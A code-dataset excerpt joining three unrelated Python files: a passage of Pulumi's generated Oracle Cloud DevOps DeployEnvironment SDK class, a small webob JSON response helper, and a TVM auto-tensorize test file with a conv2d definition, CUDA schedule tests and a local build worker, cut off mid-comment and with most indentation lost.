def freeform_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "freeform_tags", value)
@property
@pulumi.getter(name="functionId")
def function_id(self) -> Optional[pulumi.Input[str]]:
"""
(Updatable) The OCID of the Function.
"""
return pulumi.get(self, "function_id")
@function_id.setter
def function_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "function_id", value)
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> Optional[pulumi.Input[str]]:
"""
A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@lifecycle_details.setter
def lifecycle_details(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "lifecycle_details", value)
@property
@pulumi.getter(name="projectId")
def project_id(self) -> Optional[pulumi.Input[str]]:
"""
The OCID of a project.
"""
return pulumi.get(self, "project_id")
@project_id.setter
def project_id(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "project_id", value)
@property
@pulumi.getter
def state(self) -> Optional[pulumi.Input[str]]:
"""
The current state of the deployment environment.
"""
return pulumi.get(self, "state")
@state.setter
def state(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "state", value)
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> Optional[pulumi.Input[Mapping[str, Any]]]:
"""
Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
"""
return pulumi.get(self, "system_tags")
@system_tags.setter
def system_tags(self, value: Optional[pulumi.Input[Mapping[str, Any]]]):
pulumi.set(self, "system_tags", value)
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> Optional[pulumi.Input[str]]:
"""
Time the deployment environment was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_created")
@time_created.setter
def time_created(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_created", value)
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> Optional[pulumi.Input[str]]:
"""
Time the deployment environment was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_updated")
@time_updated.setter
def time_updated(self, value: Optional[pulumi.Input[str]]):
pulumi.set(self, "time_updated", value)
class DeployEnvironment(pulumi.CustomResource):
@overload
def __init__(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_environment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
__props__=None):
"""
This resource provides the Deploy Environment resource in Oracle Cloud Infrastructure Devops service.
Creates a new deployment environment.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_deploy_environment = oci.devops.DeployEnvironment("testDeployEnvironment",
deploy_environment_type=var["deploy_environment_deploy_environment_type"],
project_id=oci_devops_project["test_project"]["id"],
cluster_id=oci_containerengine_cluster["test_cluster"]["id"],
compute_instance_group_selectors=oci.devops.DeployEnvironmentComputeInstanceGroupSelectorsArgs(
items=[oci.devops.DeployEnvironmentComputeInstanceGroupSelectorsItemArgs(
selector_type=var["deploy_environment_compute_instance_group_selectors_items_selector_type"],
compute_instance_ids=var["deploy_environment_compute_instance_group_selectors_items_compute_instance_ids"],
query=var["deploy_environment_compute_instance_group_selectors_items_query"],
region=var["deploy_environment_compute_instance_group_selectors_items_region"],
)],
),
defined_tags={
"foo-namespace.bar-key": "value",
},
description=var["deploy_environment_description"],
display_name=var["deploy_environment_display_name"],
freeform_tags={
"bar-key": "value",
},
function_id=oci_functions_function["test_function"]["id"])
```
## Import
DeployEnvironments can be imported using the `id`, e.g.
```sh
$ pulumi import oci:devops/deployEnvironment:DeployEnvironment test_deploy_environment "id"
```
:param str resource_name: The name of the resource.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_id: (Updatable) The OCID of the Kubernetes cluster.
        :param pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']] compute_instance_group_selectors: (Updatable) A collection of selectors. The combination of instances matching the selectors is included in the instance group.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_environment_type: (Updatable) Deployment environment type.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment environment.
:param pulumi.Input[str] display_name: (Updatable) Deployment environment display name. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_id: (Updatable) The OCID of the Function.
:param pulumi.Input[str] project_id: The OCID of a project.
"""
...
@overload
def __init__(__self__,
resource_name: str,
args: DeployEnvironmentArgs,
opts: Optional[pulumi.ResourceOptions] = None):
"""
This resource provides the Deploy Environment resource in Oracle Cloud Infrastructure Devops service.
Creates a new deployment environment.
## Example Usage
```python
import pulumi
import pulumi_oci as oci
test_deploy_environment = oci.devops.DeployEnvironment("testDeployEnvironment",
deploy_environment_type=var["deploy_environment_deploy_environment_type"],
project_id=oci_devops_project["test_project"]["id"],
cluster_id=oci_containerengine_cluster["test_cluster"]["id"],
compute_instance_group_selectors=oci.devops.DeployEnvironmentComputeInstanceGroupSelectorsArgs(
items=[oci.devops.DeployEnvironmentComputeInstanceGroupSelectorsItemArgs(
selector_type=var["deploy_environment_compute_instance_group_selectors_items_selector_type"],
compute_instance_ids=var["deploy_environment_compute_instance_group_selectors_items_compute_instance_ids"],
query=var["deploy_environment_compute_instance_group_selectors_items_query"],
region=var["deploy_environment_compute_instance_group_selectors_items_region"],
)],
),
defined_tags={
"foo-namespace.bar-key": "value",
},
description=var["deploy_environment_description"],
display_name=var["deploy_environment_display_name"],
freeform_tags={
"bar-key": "value",
},
function_id=oci_functions_function["test_function"]["id"])
```
## Import
DeployEnvironments can be imported using the `id`, e.g.
```sh
$ pulumi import oci:devops/deployEnvironment:DeployEnvironment test_deploy_environment "id"
```
:param str resource_name: The name of the resource.
:param DeployEnvironmentArgs args: The arguments to use to populate this resource's properties.
:param pulumi.ResourceOptions opts: Options for the resource.
"""
...
def __init__(__self__, resource_name: str, *args, **kwargs):
resource_args, opts = _utilities.get_resource_args_opts(DeployEnvironmentArgs, pulumi.ResourceOptions, *args, **kwargs)
if resource_args is not None:
__self__._internal_init(resource_name, opts, **resource_args.__dict__)
else:
__self__._internal_init(resource_name, *args, **kwargs)
def _internal_init(__self__,
resource_name: str,
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_environment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
__props__=None):
if opts is None:
opts = pulumi.ResourceOptions()
if not isinstance(opts, pulumi.ResourceOptions):
raise TypeError('Expected resource options to be a ResourceOptions instance')
if opts.version is None:
opts.version = _utilities.get_version()
if opts.id is None:
if __props__ is not None:
raise TypeError('__props__ is only valid when passed in combination with a valid opts.id to get an existing resource')
__props__ = DeployEnvironmentArgs.__new__(DeployEnvironmentArgs)
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["compute_instance_group_selectors"] = compute_instance_group_selectors
__props__.__dict__["defined_tags"] = defined_tags
if deploy_environment_type is None and not opts.urn:
raise TypeError("Missing required property 'deploy_environment_type'")
__props__.__dict__["deploy_environment_type"] = deploy_environment_type
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["function_id"] = function_id
if project_id is None and not opts.urn:
raise TypeError("Missing required property 'project_id'")
__props__.__dict__["project_id"] = project_id
__props__.__dict__["compartment_id"] = None
__props__.__dict__["lifecycle_details"] = None
__props__.__dict__["state"] = None
__props__.__dict__["system_tags"] = None
__props__.__dict__["time_created"] = None
__props__.__dict__["time_updated"] = None
super(DeployEnvironment, __self__).__init__(
'oci:devops/deployEnvironment:DeployEnvironment',
resource_name,
__props__,
opts)
@staticmethod
def get(resource_name: str,
id: pulumi.Input[str],
opts: Optional[pulumi.ResourceOptions] = None,
cluster_id: Optional[pulumi.Input[str]] = None,
compartment_id: Optional[pulumi.Input[str]] = None,
compute_instance_group_selectors: Optional[pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']]] = None,
defined_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
deploy_environment_type: Optional[pulumi.Input[str]] = None,
description: Optional[pulumi.Input[str]] = None,
display_name: Optional[pulumi.Input[str]] = None,
freeform_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
function_id: Optional[pulumi.Input[str]] = None,
lifecycle_details: Optional[pulumi.Input[str]] = None,
project_id: Optional[pulumi.Input[str]] = None,
state: Optional[pulumi.Input[str]] = None,
system_tags: Optional[pulumi.Input[Mapping[str, Any]]] = None,
time_created: Optional[pulumi.Input[str]] = None,
time_updated: Optional[pulumi.Input[str]] = None) -> 'DeployEnvironment':
"""
Get an existing DeployEnvironment resource's state with the given name, id, and optional extra
properties used to qualify the lookup.
:param str resource_name: The unique name of the resulting resource.
:param pulumi.Input[str] id: The unique provider ID of the resource to lookup.
:param pulumi.ResourceOptions opts: Options for the resource.
:param pulumi.Input[str] cluster_id: (Updatable) The OCID of the Kubernetes cluster.
:param pulumi.Input[str] compartment_id: The OCID of a compartment.
        :param pulumi.Input[pulumi.InputType['DeployEnvironmentComputeInstanceGroupSelectorsArgs']] compute_instance_group_selectors: (Updatable) A collection of selectors. The combination of instances matching the selectors is included in the instance group.
:param pulumi.Input[Mapping[str, Any]] defined_tags: (Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
:param pulumi.Input[str] deploy_environment_type: (Updatable) Deployment environment type.
:param pulumi.Input[str] description: (Updatable) Optional description about the deployment environment.
:param pulumi.Input[str] display_name: (Updatable) Deployment environment display name. Avoid entering confidential information.
:param pulumi.Input[Mapping[str, Any]] freeform_tags: (Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
:param pulumi.Input[str] function_id: (Updatable) The OCID of the Function.
:param pulumi.Input[str] lifecycle_details: A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
:param pulumi.Input[str] project_id: The OCID of a project.
:param pulumi.Input[str] state: The current state of the deployment environment.
:param pulumi.Input[Mapping[str, Any]] system_tags: Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
:param pulumi.Input[str] time_created: Time the deployment environment was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
:param pulumi.Input[str] time_updated: Time the deployment environment was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
opts = pulumi.ResourceOptions.merge(opts, pulumi.ResourceOptions(id=id))
__props__ = _DeployEnvironmentState.__new__(_DeployEnvironmentState)
__props__.__dict__["cluster_id"] = cluster_id
__props__.__dict__["compartment_id"] = compartment_id
__props__.__dict__["compute_instance_group_selectors"] = compute_instance_group_selectors
__props__.__dict__["defined_tags"] = defined_tags
__props__.__dict__["deploy_environment_type"] = deploy_environment_type
__props__.__dict__["description"] = description
__props__.__dict__["display_name"] = display_name
__props__.__dict__["freeform_tags"] = freeform_tags
__props__.__dict__["function_id"] = function_id
__props__.__dict__["lifecycle_details"] = lifecycle_details
__props__.__dict__["project_id"] = project_id
__props__.__dict__["state"] = state
__props__.__dict__["system_tags"] = system_tags
__props__.__dict__["time_created"] = time_created
__props__.__dict__["time_updated"] = time_updated
return DeployEnvironment(resource_name, opts=opts, __props__=__props__)
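    # Hedged usage sketch (not part of the generated SDK): an existing
    # environment can be adopted into state by OCID, for example:
    #
    #   env = oci.devops.DeployEnvironment.get(
    #       "importedDeployEnvironment",
    #       id="ocid1.devopsdeployenvironment.oc1..exampleuniqueid")
    #
    # The OCID above is a hypothetical placeholder value.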
@property
@pulumi.getter(name="clusterId")
def cluster_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the Kubernetes cluster.
"""
return pulumi.get(self, "cluster_id")
@property
@pulumi.getter(name="compartmentId")
def compartment_id(self) -> pulumi.Output[str]:
"""
The OCID of a compartment.
"""
return pulumi.get(self, "compartment_id")
@property
@pulumi.getter(name="computeInstanceGroupSelectors")
def compute_instance_group_selectors(self) -> pulumi.Output['outputs.DeployEnvironmentComputeInstanceGroupSelectors']:
"""
        (Updatable) A collection of selectors. The combination of instances matching the selectors is included in the instance group.
"""
return pulumi.get(self, "compute_instance_group_selectors")
@property
@pulumi.getter(name="definedTags")
def defined_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Defined tags for this resource. Each key is predefined and scoped to a namespace. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"foo-namespace.bar-key": "value"}`
"""
return pulumi.get(self, "defined_tags")
@property
@pulumi.getter(name="deployEnvironmentType")
def deploy_environment_type(self) -> pulumi.Output[str]:
"""
(Updatable) Deployment environment type.
"""
return pulumi.get(self, "deploy_environment_type")
@property
@pulumi.getter
def description(self) -> pulumi.Output[str]:
"""
(Updatable) Optional description about the deployment environment.
"""
return pulumi.get(self, "description")
@property
@pulumi.getter(name="displayName")
def display_name(self) -> pulumi.Output[str]:
"""
(Updatable) Deployment environment display name. Avoid entering confidential information.
"""
return pulumi.get(self, "display_name")
@property
@pulumi.getter(name="freeformTags")
def freeform_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
(Updatable) Simple key-value pair that is applied without any predefined name, type or scope. Exists for cross-compatibility only. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"bar-key": "value"}`
"""
return pulumi.get(self, "freeform_tags")
@property
@pulumi.getter(name="functionId")
def function_id(self) -> pulumi.Output[str]:
"""
(Updatable) The OCID of the Function.
"""
return pulumi.get(self, "function_id")
@property
@pulumi.getter(name="lifecycleDetails")
def lifecycle_details(self) -> pulumi.Output[str]:
"""
A message describing the current state in more detail. For example, can be used to provide actionable information for a resource in Failed state.
"""
return pulumi.get(self, "lifecycle_details")
@property
@pulumi.getter(name="projectId")
def project_id(self) -> pulumi.Output[str]:
"""
The OCID of a project.
"""
return pulumi.get(self, "project_id")
@property
@pulumi.getter
def state(self) -> pulumi.Output[str]:
"""
The current state of the deployment environment.
"""
return pulumi.get(self, "state")
@property
@pulumi.getter(name="systemTags")
def system_tags(self) -> pulumi.Output[Mapping[str, Any]]:
"""
Usage of system tag keys. These predefined keys are scoped to namespaces. See [Resource Tags](https://docs.cloud.oracle.com/iaas/Content/General/Concepts/resourcetags.htm). Example: `{"orcl-cloud.free-tier-retained": "true"}`
"""
return pulumi.get(self, "system_tags")
@property
@pulumi.getter(name="timeCreated")
def time_created(self) -> pulumi.Output[str]:
"""
Time the deployment environment was created. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_created")
@property
@pulumi.getter(name="timeUpdated")
def time_updated(self) -> pulumi.Output[str]:
"""
Time the deployment environment was updated. Format defined by [RFC3339](https://datatracker.ietf.org/doc/html/rfc3339).
"""
return pulumi.get(self, "time_updated")
hexsha: 4b2117a6cf0508de99d82b77a4bc6e2f844c791a | size: 137 | ext: py | lang: Python
max_stars: m/utils.py @ comynli/m (245f4091f0e1bddc4cff26ad89df03122987d549) | ["Apache-2.0"] | 11 stars | 2016-09-25T01:35:09.000Z to 2020-12-30T03:14:35.000Z
max_issues: mini-SQLAlchemy/utils.py @ EscapeLife/mini-SQLAlchemy (c5e4d08349c6469884c5668f4c9dc86cd631b257) | ["Apache-2.0"] | null
max_forks: mini-SQLAlchemy/utils.py @ EscapeLife/mini-SQLAlchemy (c5e4d08349c6469884c5668f4c9dc86cd631b257) | ["Apache-2.0"] | 21 forks | 2016-09-24T09:56:31.000Z to 2020-02-18T05:57:21.000Z
import json
from webob import Response
def jsonify(**kwargs):
    """Serialize the keyword arguments to JSON and wrap them in a webob Response."""
    return Response(json.dumps(kwargs), content_type='application/json')
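# Hedged usage sketch (illustrative, not part of the original module): because
# jsonify returns a webob Response, it can be handed straight back from a
# WSGI-style handler, e.g.
#
#   def handler(request):
#       return jsonify(status="ok", count=3)
#
# which serves the body '{"status": "ok", "count": 3}' with the
# application/json content type.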
hexsha: d9b3375057cc74b08759f018c6878f2a94060fd0 | size: 52,384 | ext: py | lang: Python
max_stars: tests/python/auto_tensorize/test_auto_schedule.py @ QinHan-Erin/AMOS (634bf48edf4015e4a69a8c32d49b96bce2b5f16f) | ["Apache-2.0"] | 22 stars | 2022-03-18T07:29:31.000Z to 2022-03-23T14:54:32.000Z
max_issues: tests/python/auto_tensorize/test_auto_schedule.py @ QinHan-Erin/AMOS (634bf48edf4015e4a69a8c32d49b96bce2b5f16f) | ["Apache-2.0"] | null
max_forks: tests/python/auto_tensorize/test_auto_schedule.py @ QinHan-Erin/AMOS (634bf48edf4015e4a69a8c32d49b96bce2b5f16f) | ["Apache-2.0"] | 2 forks | 2022-03-18T08:26:34.000Z to 2022-03-20T06:02:48.000Z
import tvm
import os
import time
import tempfile
import shutil
import numpy as np
from tvm import testing
from tvm import auto_tensorize as at
from tvm.contrib import tar, ndk
from tvm import auto_scheduler
from tvm.ir import transform
from tvm.driver import build_module
from tvm.runtime import Object, module, ndarray
import multiprocessing as multi
from pebble import concurrent
from concurrent.futures import TimeoutError
from pebble import ProcessPool, ProcessExpired
from tvm import tg
from collections import OrderedDict
TEST_CASES = OrderedDict()
def register_test(func):
name = func.__name__
prefix = "test"
assert name[:len(prefix)] == prefix
try:
number = int(name[len(prefix):])
def _inner(*args, **kwargs):
print(func.__doc__)
func(*args, **kwargs)
assert number not in TEST_CASES, "Repeated test case number %d" % number
TEST_CASES[number] = _inner
except ValueError as e:
print(e)
print("Can't convert to number", name[len(prefix):])
def conv2d(N, C, H, W, K, R, S, stride, padding, with_bias=True, in_dtype=["float16", "float16"], out_dtype="float32"):
H = H + 2 * padding
W = W + 2 * padding
A = tvm.te.placeholder([N, C, H, W], dtype=in_dtype[0], name="A")
B = tvm.te.placeholder([K, C, R, S], dtype=in_dtype[1], name="B")
rc = tvm.te.reduce_axis([0, C], name="rc")
rr = tvm.te.reduce_axis([0, R], name="rr")
rs = tvm.te.reduce_axis([0, S], name="rs")
P = (H - R) // stride + 1
Q = (W - S) // stride + 1
if in_dtype[0] == "uint8":
Conv = tvm.te.compute(
[N, K, P, Q],
lambda n, k, p, q:
tvm.te.sum((A[n, rc, p+rr, q+rs].astype(out_dtype) * B[k, rc, rr, rs].astype(out_dtype)
), axis=[rc, rr, rs]),
name="Conv"
)
else:
Conv = tvm.te.compute(
[N, K, P, Q],
lambda n, k, p, q:
tvm.te.sum((A[n, rc, p+rr, q+rs] * B[k, rc, rr, rs]
).astype(out_dtype), axis=[rc, rr, rs]),
name="Conv"
)
if not with_bias:
return [A, B, Conv]
bias = tvm.te.placeholder([N, K, P, Q], dtype=out_dtype, name="bias")
E = tvm.te.compute(
[N, K, P, Q],
lambda bn, bk, bp, bq: Conv[bn, bk, bp, bq] + bias[bn, bk, bp, bq],
name="E"
)
return [A, B, bias, E]
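# Worked shape example (derived from the definitions above): for
# conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1), padding grows H = W = 14 + 2*1 = 16,
# so P = Q = (16 - 3)//1 + 1 = 14 and the outputs Conv/E have shape [1, 64, 14, 14].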
def get_np_arrays(tensors):
ret = []
for t in tensors:
np_ary = np.random.uniform(-1, 1, [int(x)
for x in t.shape]).astype(t.dtype)
ret.append(np_ary)
return ret
def get_tvm_arrays_from_np_arrays(arys, ctx):
ret = []
for ary in arys:
tvm_ary = tvm.nd.array(ary, ctx)
ret.append(tvm_ary)
return ret
def get_tvm_arrays(tensors, ctx):
ret = []
for t in tensors:
np_ary = np.random.uniform(-1, 1, [int(x)
for x in t.shape]).astype(t.dtype)
tvm_ary = tvm.nd.array(np_ary, ctx)
ret.append(tvm_ary)
return ret
@register_test
def test1():
print("##########################")
print("Test 1")
hw_abs_dag = at.WMMAFp16Fp32()
compute_key = "nnn"
shape_key = "8x32x16"
intrin_dag, _ = hw_abs_dag.get_effective_compute_dag(compute_key, shape_key)
A, B, bias, E = conv2d(1, 128, 14, 14, 64, 3, 3, 1, 1)
target_dag = at.compute_dag_from_tensors([E])
inputs_ref = target_dag.get_inputs()
sch_ref = tvm.te.create_schedule([x.op for x in target_dag.tensors])
func_ref = tvm.build(sch_ref, inputs_ref +
list(target_dag.tensors), "llvm")
ctx = tvm.cpu()
inputs_np_arrays = get_np_arrays(inputs_ref)
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays_ref = get_tvm_arrays(list(target_dag.tensors), ctx)
func_ref(*inputs_arrays, *outputs_arrays_ref)
main_op_map = {
intrin_dag.op_lst[0]: target_dag.op_lst[0]
}
elem_op_map = {
}
ii, jj = intrin_dag.op_lst[0].axis
kk, = intrin_dag.op_lst[0].reduce_axis
n, k, p, q = target_dag.op_lst[0].axis
rc, rr, rs = target_dag.op_lst[0].reduce_axis
axis_map = {
ii: [n, n, n, p, p, q, q],
jj: [k, k, k, k, k, k, k],
kk: [rc, rr, rs, rc, rs, rc, rr]
}
match_result = at.IntrinMatchResult(
hw_abs_dag, compute_key, shape_key,
main_op_map, elem_op_map,
axis_map, target_dag, intrin_dag
)
gen = at.MappingGenerator(match_result)
for i in range(1):
record = gen.get()
record.vmap_choice = ([1, 0, 0, 0, 0, 0, 1], record.vmap_choice[1])
print(record.to_json())
app = at.MappingApplier(match_result)
new_state = app.apply(record)
# print("Compare new state and old state:")
# print("new axis map:", new_state.axis_map)
# tmp = []
# for k, v in new_state.axis_map.items():
# tmp.append(v)
# for tri in zip(*tmp):
# print(tri)
# print("new main op map:", new_state.main_op_map)
# new_target_dag = new_state.target_dag
# print("org dag len:", len(new_target_dag.op_lst))
# new_target_main_op = None
# for k, v in new_state.main_op_map.items():
# new_target_main_op = v
# assert new_target_main_op is not None
# new_target_dag, _ = at.reconstruct_dag_as_intrin(
# new_target_dag, new_target_main_op, hw_abs_dag, compute_key, shape_key)
# print("new dag len:", len(new_target_dag.op_lst))
# print("new dag load A op:",
# new_target_dag.op_lst[2].axis, new_target_dag.op_lst[2].body)
# print("new dag load B op:",
# new_target_dag.op_lst[5].axis, new_target_dag.op_lst[5].body)
# print("new dag main op:",
# new_target_dag.op_lst[6].axis, new_target_dag.op_lst[6].body)
# print("new dag store op:",
# new_target_dag.op_lst[7].axis, new_target_dag.op_lst[7].body)
schedule_gen = at.CUDAScheduleGenerator(match_result, new_state)
sc_info = schedule_gen.get_schedule_compute_info()
schedule_app = at.CUDAScheduleApplier(match_result, sc_info)
params = schedule_gen.get()
my_params = {
'vectorize': (1, 1),
'spatial_factors': [([1, 1, 1], (0, 0)), ([4, 1, 1], (-1, 1)), ([14, 1, 1], (-1, -1))],
'reduce_factors': [([3, 3, 4], (1, 1)), ([1, 1, 3], (0, -1))],
'last_factors': [([-1, 32], (-1,))],
'output_unroll_step': (64, -1),
'last_unroll_step': (512, 1)}
params.from_json(my_params)
print(params.to_json())
new_target_dag = sc_info.target_dag
new_inputs = new_target_dag.get_inputs()
sch = tvm.te.create_schedule([x.op for x in new_target_dag.tensors])
# print(tvm.lower(
# sch, new_inputs + list(new_target_dag.tensors), simple_mode=True), flush=True)
# print("new dag len:", len(new_target_dag.op_lst))
# print("new dag load A op:",
# new_target_dag.op_lst[2].axis, new_target_dag.op_lst[2].body)
# print("new dag load B op:",
# new_target_dag.op_lst[5].axis, new_target_dag.op_lst[5].body)
# print("new dag main op:",
# new_target_dag.op_lst[6].axis, new_target_dag.op_lst[6].body)
# print("new dag store op:",
# new_target_dag.op_lst[7].axis, new_target_dag.op_lst[7].body)
schedule_app.apply(sch, params)
# print(tvm.lower(
# sch, new_inputs + list(new_target_dag.tensors), simple_mode=True), flush=True)
func = tvm.build(sch, new_inputs +
list(new_target_dag.tensors), "cuda")
# print(func.imported_modules[0].get_source())
# print(new_target_dag.tensors)
ctx = tvm.gpu()
inputs_arrays = get_tvm_arrays_from_np_arrays(inputs_np_arrays, ctx)
outputs_arrays = get_tvm_arrays(list(new_target_dag.tensors), ctx)
func(*inputs_arrays, *outputs_arrays)
for a, b in zip(outputs_arrays_ref, outputs_arrays):
testing.assert_allclose(
a.asnumpy(), b.asnumpy(), atol=1e-3, rtol=1e-2)
# get performance
evaluator = func.time_evaluator(func.entry_name, ctx, number=10)
costs = evaluator(*inputs_arrays, *outputs_arrays)
print("Time cost: %f ms." % (costs.mean * 1e3))
gen.feedback(record, np.random.random())
print("Pass!\n")
GLOBAL_BUILD_INPUTS = None
GLOBAL_RUN_INPUTS = None
GLOBAL_RPC_RUN_INPUTS = None
MAX_FLOAT = 1e10  # We use 1e10 instead of sys.float_info.max for better readability in logs
# this is similar to auto_scheduler
def native_local_build_worker(index):
"""
    Build function of LocalBuilder to be run in the Builder thread pool.
Parameters
----------
index : int
The MeasureInput index to be processed by the current Builder thread.
Returns
-------
res : BuildResult
The build result of this Builder thread.
"""
global GLOBAL_BUILD_INPUTS
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
if not GLOBAL_BUILD_INPUTS:
raise ValueError("GLOBAL_BUILD_INPUTS not found")
(
sch_app,
params_lst,
build_func,
target,
target_host,
timeout,
verbose
) = GLOBAL_BUILD_INPUTS
assert isinstance(build_func, str)
if build_func == "default":
build_func = tar.tar
elif build_func == "ndk":
build_func = ndk.create_shared
else:
raise ValueError("Invalid build_func" + build_func)
def timed_func():
tic = time.time()
params = params_lst[index]
target_dag = sch_app.target_dag
inputs = target_dag.get_inputs()
sch = tvm.te.create_schedule([x.op for x in target_dag.tensors])
error_no = auto_scheduler.measure.MeasureErrorNo.NO_ERROR
error_msg = None
args = inputs + list(target_dag.tensors)
try:
sch = sch_app.apply(sch, params)
# pylint: disable=broad-except
except Exception:
error_no = auto_scheduler.measure.MeasureErrorNo.INSTANTIATION_ERROR
error_msg = auto_scheduler.measure.make_error_msg()
if error_no == 0:
dirname = tempfile.mkdtemp()
filename = os.path.join(dirname, "tmp_func." + build_func.output_format)
try:
# TODO(merrymercy): Port the unroll pass.
with transform.PassContext():
func = build_module.build(
sch, args, target=target, target_host=target_host
)
func.export_library(filename, build_func)
# pylint: disable=broad-except
except Exception:
error_no = auto_scheduler.measure.MeasureErrorNo.COMPILE_HOST
error_msg = auto_scheduler.measure.make_error_msg()
else:
filename = ""
if verbose >= 1:
if error_no == auto_scheduler.measure.MeasureErrorNo.NO_ERROR:
print(".Y", end="", flush=True)
else:
print(".E", end="", flush=True) # Build error
return (filename, args, error_no, error_msg, time.time() - tic)
res = auto_scheduler.utils.call_func_with_timeout(timeout, timed_func)
if isinstance(res, TimeoutError):
if verbose >= 1:
print(".T", end="") # Build timeout
res = None, [], auto_scheduler.measure.MeasureErrorNo.BUILD_TIMEOUT, None, timeout
return res
def native_local_builder_build(sch_app, params_lst, target, target_host, timeout, n_parallel, build_func="default", verbose=1):
"""
    Build function of LocalBuilder to build the MeasureInputs into runnable modules.
Parameters
----------
inputs : List[MeasureInput]
The MeasureInputs to be built.
timeout : int
The timeout limit (in second) for each build thread.
This is used in a wrapper of the multiprocessing.Process.join().
n_parallel : int
Number of threads used to build in parallel.
build_func : str = 'default'
The name of build function to process the built module.
verbose: int = 1
Verbosity level. 0 for silent, 1 to output information during program building.
Returns
-------
res : List[BuildResult]
The build results of these MeasureInputs.
"""
# We use fork and a global variable to copy arguments between processes.
# This can avoid expensive serialization of TVM IR when using multiprocessing.Pool
global GLOBAL_BUILD_INPUTS
GLOBAL_BUILD_INPUTS = (sch_app, params_lst, build_func, target, target_host, timeout, verbose)
pool = auto_scheduler.measure.NoDaemonPool(n_parallel)
    tuple_res = pool.map(native_local_build_worker, range(len(params_lst)))
pool.terminate()
pool.join()
del pool
results = []
for res in tuple_res:
results.append(auto_scheduler.measure.BuildResult(*res))
if verbose >= 1:
print("", flush=True)
return results
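# Hedged usage sketch: given a schedule applier and candidate parameter sets,
# a batch local build might look like
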